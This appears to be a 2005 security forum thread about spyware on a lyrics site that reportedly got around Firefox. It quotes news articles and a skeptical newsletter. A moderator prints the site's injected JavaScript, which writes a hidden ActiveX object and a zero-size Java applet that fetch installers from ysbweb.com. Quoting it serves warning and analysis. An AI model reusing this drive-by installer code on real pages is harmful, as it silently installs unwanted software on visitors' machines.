I thought this would be of interest to our members as I read this report from another security forum.
========================================================

-{ Quote: "What if there was an infection out there that could bypass Firefox and still get its grubby little paws on IE, and from there, the heart of your OS? What if that same infection could get past not only FF, but a whole raft of other (supposedly more secure) browsers too?

What if, of all people, Neil Diamond was indirectly involved in this craziness?

Unfortunately, this has now become a reality and woe betide anyone looking for lyrics from Neil's latest hit. You're more likely to end up with a nasty case of browseritis. After hearing rumours of a Firefox Adware bundle from this thread, I thought I'd go check it out. The results were, as they say, a right kick in the pants." }-

paperghost's article can be found here, at Vital Security.org - Firefox Spyware infects IE? (http://www.vitalsecurity.org/2005/03/firefox-spyware-infects-ie.html)


Edit Note - Please do not copy & paste an entire article - a summary or paragraph from the article is enough. Also, a link to the original source should be included. - snap

Take a look here.... with links to the Coyote thread
http://www.wilderssecurity.com/showthread.php?t=70025

From spywareinfoforum.com:

-{ Quote: "Quick! Run for the hills! Firefox spyware is running rampant and infecting every computer in sight!

*sigh*

Sometimes I just want to bang my head on the desk and keep doing it until the desk surrenders unconditionally. If you were to believe several online news sites, there is an epidemic of spyware infecting Internet Explorer by way of Firefox. If you were also to believe that these accounts were written by competant journalists who have checked their facts, you would be wrong on both counts. " }-Spywareinfo Newsletter Mar13/05 (http://www.spywareinfoforum.com/newsletter/archives/2005/mar13.php#firefox)

-{ Quote: "From spywareinfoforum.com:

Spywareinfo Newsletter Mar13/05 (http://www.spywareinfoforum.com/newsletter/archives/2005/mar13.php#firefox)" }-

Yeah, our very own bunch of "Experts" on this forum were muttering about scripts and whatnot in the thread "a new theory", when I tried to point out that it was just JAVA. But of course, I was ignored cos I'm a newbie.

-{ Quote: "Yeah, our very own bunch of "Experts" on this forum were muttering about scripts and whatnot in the thread "a new theory", when I tried to point out that it was just JAVA. But of course, I was ignored cos I'm a newbie." }-Having re-read the original Wilders thread that I'm assuming you are referring to concerning this exploit....the script comments were mentioned if for no other reason than to caution IE users not to visit that site with Active script enabled because the java applet would be loaded along with a toolbar.

Opinions may vary....but I would hardly call any posts directed toward your posts as being dismissed. I also am of the opinion one can not BS a BS concerning...."I was ignored cos I'm a newbie" ;)

Do not visit the below links without being properly secured

Visiting lyricspy.com with Active script enabled excutes the below code:

<script language='JavaScript' type='text/JavaScript'
src='http://www.ysbweb.com/ist/scripts/ysb_prompt.php?
retry=2&loadfirst=1&delayload=0&software_id=10&account_id=1001958&
recurrence=always&adid=a1110115353&event_type=onload&user_level=3'>
</script>

Which then excutes the below code:

function showActiveX() {
holder.write('<OBJECT id="barobject" width=1 height=1
classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
holder.write
('codebase="http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab"
onerror="parent.retryit();">');

holder.write('<PARAM name="account_id" value="1001958">');
holder.write('<PARAM name="download_key"
value="df42914d752e3362ade7e24cced39c71">');
holder.write('<PARAM name="download_lock" value="1110807725">');
holder.write('<PARAM name="cfg" value="ysb_l3">');
holder.write('<PARAM name="sub" value="">');
holder.write('</OBJECT>');
}

function showJava() {

holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
holder.write('<PARAM name="account_id" value="1001958">');
holder.write('<PARAM name="download_key" value="df42914d752e3362ade7e24cced39c71">');
holder.write('<PARAM name="download_lock" value="1110807725">');
holder.write('<PARAM name="cfg" value="ysb_l3">');
holder.write('<PARAM name="sub" value="">');
holder.write('</APPLET>');

Since we already have an ongoing thread concerning this issue from last week....I'll ask those that wish to continue the discussion Please visit the below link. This thread is now closed.

This link---> New Theory about Infections and Spyware (http://www.wilderssecurity.com/showthread.php?t=70025)